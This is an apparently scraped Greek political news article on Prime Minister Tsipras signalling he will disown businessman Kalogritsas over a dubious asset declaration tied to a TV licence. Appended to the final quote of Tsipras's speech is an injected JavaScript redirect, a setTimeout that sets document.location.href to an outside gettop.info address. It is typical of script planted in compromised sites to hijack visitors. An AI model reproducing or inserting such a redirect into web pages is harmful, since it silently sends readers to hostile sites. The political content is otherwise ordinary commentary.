Ο Τσίπρας είναι έτοιμος να αποκηρύξει τον Καλογρίτσα

0
10

 

Μετά τον σάλο που έχει προκληθεί για το διάτρητο πόθεν έσχες του επιχειρηματία Γιάννη Βλαδίμηρου Καλογρίτσα, ο πρωθυπουργός αποφάσισε να κάνει δημόσια αναφορά -έστω και χωρίς να αναφέρει το όνομά του.

Στην ομιλία του στην κεντρική επιτροπή του Σύριζα σημείωσε ότι «όποιος δεν έχει
δυνατότητα να πληρώσει για την τηλεοπτική άδεια που κέρδισε ή να δικαιολογήσει τα χρήματά του, θα εκπέσει το επόμενο δευτερόλεπτο».

Για να πείσει, μάλιστα, ότι εννοεί όσα λέει, και δεν επηρεάζεται από το γεγονός ότι ο Καλογρίτσας είναι στενός φίλος του υπουργού Επικρατείας Νίκου Παππά και κουμπάρος του υπουργού Υποδομών και Δικτύων Χρήστου Σπίρτζη, πρόσθεσε: «δεν μας ενδιαφέρει το όνομα, δεν έχουμε φίλους εμείς».

Αυτόματα, βέβαια, ανακύπτει το ερώτημα «πότε είναι το επόμενο δευτερόλεπτο για να εκπέσει κάποιος από τους νέοευς καναλάρχες«. Διότι η επιτροπή που είχε οριστεί έκρινε ως «προβιβαστέο» το πόθεν έσχες και του Καλογρίτσα την περασμένη εβδομάδα και ο γενικός γραμματέας Ενημέρωσης ανακοίνωσε πως…όλα καλά, όλα ανθηρά!

Με δυο λόγια πέρασαν 10 μέρες και το «επόμενο δευτερόλεπτο» δεν ήρθε ποτέ. Παρότι η δημοσιογραφική έρευνα έχει αναδείξει σημεία και τέρατα, για βοσκοτόπια στα κατσάβραχα της Ιθάκης που δήθεν αξίζουν 100 εκατ ευρώ και για υπογραφές ανθρώπων που έχουν πεθάνει από το 2011.

Τελευταίο, αλλά όχι λιγότερο σημαντικό: θα έκανε αυτή την αναφορά ο Αλέξης Τσίπρας αν δεν είχε βουίξει το σύμπαν για τον Καλογρίτσα; Ή θα περνούσε στα μουλωχτά το θέμα;

Το ερώτημα είναι θεωρητικό και η απάντηση προφανής. Ο πρωθυπουργός αντιλαμβάνεται ότι ο «καναλάρχης του ΣΥΡΙΖΑ» τού προκαλεί, πλέον, τεράστια φθορά και απειλεί με κλονισμό την αξιοπιστία του συνόλου του διαγωνισμού για τις τηλεοπτικές άδειες. Γι αυτό και δείχνει έτοιμος να τον αποκηρύξει…

Διαβάστε τι ακριβώς είπε στην κεντρική επιτροπή:

«Αν κάποιος από τους προσωρινούς υπερθεματιστές, δεν μας ενδιαφέρει το όνομα, δεν έχουμε φίλους εμείς, δεν έχει τη δυνατότητα να πληρώσει ή να δικαιολογήσει τα χρήματά του θα εκπέσει το επομενο δευτερόλεπτο» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here